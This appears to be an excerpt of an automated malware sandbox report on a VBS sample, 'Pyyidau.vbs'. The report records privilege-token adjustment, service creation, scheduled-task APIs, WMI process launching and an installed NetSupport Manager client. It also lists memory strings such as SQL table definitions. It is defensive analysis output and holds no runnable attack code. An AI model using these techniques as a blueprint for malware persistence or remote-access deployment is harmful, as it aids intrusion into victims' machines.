                                Source: api-ms-win-core-util-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-math-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-convert-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-locale-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-environment-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-localization-l1-2-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-file-l2-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-string-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-rtlsupport-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-heap-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-processthreads-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-libraryloader-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: Pyyidau.vbs.exe, 00000003.00000002.2004495174.00000000110C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcredist_x86.exe~/ vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1915140690.000000000D2A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcredist_x86.exe~/ vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1824644395.0000000002A59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1836537031.0000000008360000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000003.00000000.1717740506.00000000002D4000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1973863526.00000000100C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcredist_x86.exe~/ vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825322765.00000000047A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825322765.00000000047FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Pyyidau.vbs
                                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2298
                                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2298Jump to behavior
                                Source: WdfCoInstaller01005.dll.22.drStatic PE information: Section: .rsrc ZLIB complexity 0.9963142759691381
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                                Source: classification engineClassification label: mal100.bank.troj.expl.evad.winVBS@72/246@3/3
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00AFC0F0 AdjustTokenPrivileges,CloseHandle,28_2_00AFC0F0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00AFC060 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,28_2_00AFC060
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B222C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetTokenInformation,GetTokenInformation,_malloc,GetTokenInformation,LookupPrivilegeNameW,_free,CloseHandle,28_2_00B222C0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B24420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,28_2_00B24420
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00AFEAB0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,28_2_00AFEAB0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B315D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,28_2_00B315D0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0046C060 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,30_2_0046C060
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0046C0F0 AdjustTokenPrivileges,CloseHandle,30_2_0046C0F0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004922C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetTokenInformation,GetTokenInformation,_malloc,GetTokenInformation,LookupPrivilegeNameW,_free,CloseHandle,30_2_004922C0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_00494420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,30_2_00494420
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0046EAB0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,30_2_0046EAB0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004A15D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,30_2_004A15D0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_0018C060 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,32_2_0018C060
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_0018C0F0 AdjustTokenPrivileges,CloseHandle,32_2_0018C0F0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001B22C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetTokenInformation,GetTokenInformation,_malloc,GetTokenInformation,LookupPrivilegeNameW,_free,CloseHandle,32_2_001B22C0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001B4420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,32_2_001B4420
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_0018EAB0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,32_2_0018EAB0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001C15D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,32_2_001C15D0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: OpenSCManagerW,GetLastError,CloseServiceHandle,wsprintfW,CloseServiceHandle,CloseServiceHandle,OpenServiceW,QueryServiceConfigW,ChangeServiceConfigW,CloseServiceHandle,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,GetSystemDirectoryW,OpenSCManagerW,FreeLibrary,GetSystemDirectoryW,OpenSCManagerW,GetLastError,FreeLibrary,CloseServiceHandle,28_2_00B2B310
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: CreateServiceW,GetLastError,StartServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,28_2_00B2F880
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: _wprintf,CreateServiceW,GetLastError,_wprintf,_wprintf,FreeLibrary,CloseServiceHandle,FreeLibrary,28_2_00AFBB90
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: CreateServiceW,GetLastError,28_2_00AE9C70
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: OpenSCManagerW,GetLastError,CloseServiceHandle,wsprintfW,CloseServiceHandle,CloseServiceHandle,OpenServiceW,QueryServiceConfigW,ChangeServiceConfigW,CloseServiceHandle,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,GetSystemDirectoryW,OpenSCManagerW,FreeLibrary,GetSystemDirectoryW,OpenSCManagerW,GetLastError,FreeLibrary,CloseServiceHandle,30_2_0049B310
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: CreateServiceW,GetLastError,StartServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,30_2_0049F880
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: _wprintf,CreateServiceW,GetLastError,_wprintf,_wprintf,FreeLibrary,CloseServiceHandle,FreeLibrary,30_2_0046BB90
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: CreateServiceW,GetLastError,30_2_00459C70
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: OpenSCManagerW,GetLastError,CloseServiceHandle,wsprintfW,CloseServiceHandle,CloseServiceHandle,OpenServiceW,QueryServiceConfigW,ChangeServiceConfigW,CloseServiceHandle,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,GetSystemDirectoryW,OpenSCManagerW,FreeLibrary,GetSystemDirectoryW,OpenSCManagerW,GetLastError,FreeLibrary,CloseServiceHandle,32_2_001BB310
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: _wprintf,CreateServiceW,GetLastError,_wprintf,_wprintf,FreeLibrary,CloseServiceHandle,FreeLibrary,32_2_0018BB90
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: CreateServiceW,GetLastError,StartServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,32_2_001BF880
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: CreateServiceW,GetLastError,32_2_00179C70
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00AF8380 CoInitialize,CoCreateInstance,CoUninitialize,28_2_00AF8380
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B08FB0 FindResourceW,LoadResource,LockResource,GetDC,SelectPalette,RealizePalette,CreateDIBitmap,ReleaseDC,DeleteObject,28_2_00B08FB0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B29630 OpenSCManagerW,GetLastError,GetLastError,OpenServiceW,GetLastError,QueryServiceStatus,QueryServiceStatus,_memset,GetSystemDirectoryW,CreateProcessW,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,QueryServiceStatus,ControlService,QueryServiceStatus,Sleep,QueryServiceStatus,GetLastError,Sleep,QueryServiceStatus,Sleep,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,RegisterEventSourceW,GetComputerNameW,wsprintfW,ReportEventW,DeregisterEventSource,GetLastError,CloseServiceHandle,CloseServiceHandle,Sleep,GetSystemDirectoryW,28_2_00B29630
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupportJump to behavior
                                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\Pyyidau.vbs.exeJump to behavior
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3128:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1360:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2312:120:WilError_03
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yzha1xoy.ipd.ps1Jump to behavior
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs"
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: module=%s28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: V14.1028_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: ver=%s28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: /ec28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: /EC28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: PCD28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: NSM28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: system.ini28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: display.drv28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: boot28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: shellscr.drv28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: display.drv28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: module=%s28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: V14.1028_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: ver=%s28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: winexec.ok28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: V15.1028_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: V14.1028_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: module=%s30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: V14.1030_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: ver=%s30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: /ec30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: /EC30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: PCD30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: NSM30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: system.ini30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: display.drv30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: boot30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: shellscr.drv30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: display.drv30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: module=%s30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: V14.1030_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: ver=%s30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: winexec.ok30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: V15.1030_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: V14.1030_2_0049DDD0
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCommand line argument: Client31_2_00E72031
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCommand line argument: Client31_2_00E72031
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: module=%s32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: V14.1032_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: ver=%s32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: /ec32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: /EC32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: Hy!32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: PCD32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: NSM32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: nsmvxd.38632_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: nsmvxd.38632_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: nsmvga.drv32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: nsmvga.drv32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: system.ini32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: display.drv32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: boot32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: shellscr.drv32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: display.drv32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: module=%s32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: V14.1032_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: ver=%s32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: winexec.ok32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: V15.1032_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: V14.1032_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: PCIAX.DLL32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: Done:32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: winexec.ok32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: Restart32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCommand line argument: Exit32_2_001BDDD0
                                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO MessageTable VALUES(%d, '%s', '%s', '%s', %d, %d, %d, '%s', '%s', %d, %I64u, %d, %d);
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO ClientTable VALUES(%d, '%s', '%s', '%s', '%s', %d, %I64u);
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ClientTable(ClientID INT,ComputerName VARCHAR(100),IPAddress VARCHAR(40),MAC VARCHAR(12),Hostname VARCHAR(100),AppType INT,Time BIGINT);
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO RecipientTable VALUES(%d, %d,%I64u, %d, '%s', '%s', %I64u);
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO FileLinks VALUES('%s', '%s', '%s');
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS MessageTable(MessageID INT,UniqueID VARCHAR(38),Text VARCHAR(256),Caption VARCHAR(80),Timeout INT,Flags INT,AppType INT,Operator VARCHAR(80),User VARCHAR(80),BroadcastFlags INT,Time BIGINT,RecipientCount INT,AcknowledgeCount INT);
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO ParamTable VALUES('%s', '%s');
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ParamTable(Param VARCHAR(100), Value VARCHAR(100));
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS FileLinks(LinkName VARCHAR(50),FileName VARCHAR(50),SubFolder VARCHAR(50));
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE ParamTable SET Value = '%s' WHERE Param = '%s';
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO ParamTable VALUES('%s', '%s');SELECT Value FROM ParamTable WHERE Param = '%s';UPDATE ParamTable SET Value = '%s' WHERE Param = '%s';CREATE TABLE IF NOT EXISTS FileLinks(LinkName VARCHAR(50),FileName VARCHAR(50),SubFolder VARCHAR(50));CREATE TABLE IF NOT EXISTS RecipientTable(MessageID INT,ClientID INT,ReceiveTime BIGINT,UserFlags INT,Username VARCHAR(80),Dept VARCHAR(80),AcknowledgeTime BIGINT);CREATE TABLE IF NOT EXISTS ScheduledMessageTable(MessageID INT,UniqueID VARCHAR(38),Text VARCHAR(256),Caption VARCHAR(80),Timeout INT,Flags INT,AppType INT,Operator VARCHAR(80),User VARCHAR(80),BroadcastFlags INT,Time BIGINT,SI_Timing INT,SI_StartDate VARCHAR(8),SI_EndDate VARCHAR(8),SI_Time VARCHAR(4),SI_WeekDays INT,SI_WeekParity INT,SI_Occurrence INT,SI_Day INT,SI_Month INT,SI_Year INT,SI_TimeZoneBias INT);CREATE TABLE IF NOT EXISTS MessageDepartments(UniqueID VARCHAR(50),Dept VARCHAR(80),Time BIGINT);CREATE TABLE IF NOT EXISTS MessageTable(MessageID INT,UniqueID VARCHAR(38),Text VARCHAR(256),Caption VARCHAR(80),Timeout INT,Flags INT,AppType INT,Operator VARCHAR(80),User VARCHAR(80),BroadcastFlags INT,Time BIGINT,RecipientCount INT,AcknowledgeCount INT);CREATE TABLE IF NOT EXISTS ClientTable(ClientID INT,ComputerName VARCHAR(100),IPAddress VARCHAR(40),MAC VARCHAR(12),Hostname VARCHAR(100),AppType INT,Time BIGINT);NextScheduledMessageIDNextMessageIDNextClientIDCREATE TABLE IF NOT EXISTS ParamTable(Param VARCHAR(100), Value VARCHAR(100));SQL error
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT Value FROM ParamTable WHERE Param = '%s';
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO ScheduledMessageTable VALUES(%d, '%s', '%s', '%s', %d, %d, %d, '%s', '%s', %d, %I64u, %d, '%s', '%s', '%s', %d, %d, %d, %d, %d, %d, %d);
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ScheduledMessageTable(MessageID INT,UniqueID VARCHAR(38),Text VARCHAR(256),Caption VARCHAR(80),Timeout INT,Flags INT,AppType INT,Operator VARCHAR(80),User VARCHAR(80),BroadcastFlags INT,Time BIGINT,SI_Timing INT,SI_StartDate VARCHAR(8),SI_EndDate VARCHAR(8),SI_Time VARCHAR(4),SI_WeekDays INT,SI_WeekParity INT,SI_Occurrence INT,SI_Day INT,SI_Month INT,SI_Year INT,SI_TimeZoneBias INT);
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ClientDupTable(id INT);
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS MessageDupTable(id INT);
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS RecipientTable(MessageID INT,ClientID INT,ReceiveTime BIGINT,UserFlags INT,Username VARCHAR(80),Dept VARCHAR(80),AcknowledgeTime BIGINT);
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS MessageDepartments(UniqueID VARCHAR(50),Dept VARCHAR(80),Time BIGINT);
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO MessageDepartments VALUES('%s', '%s', %I64u);
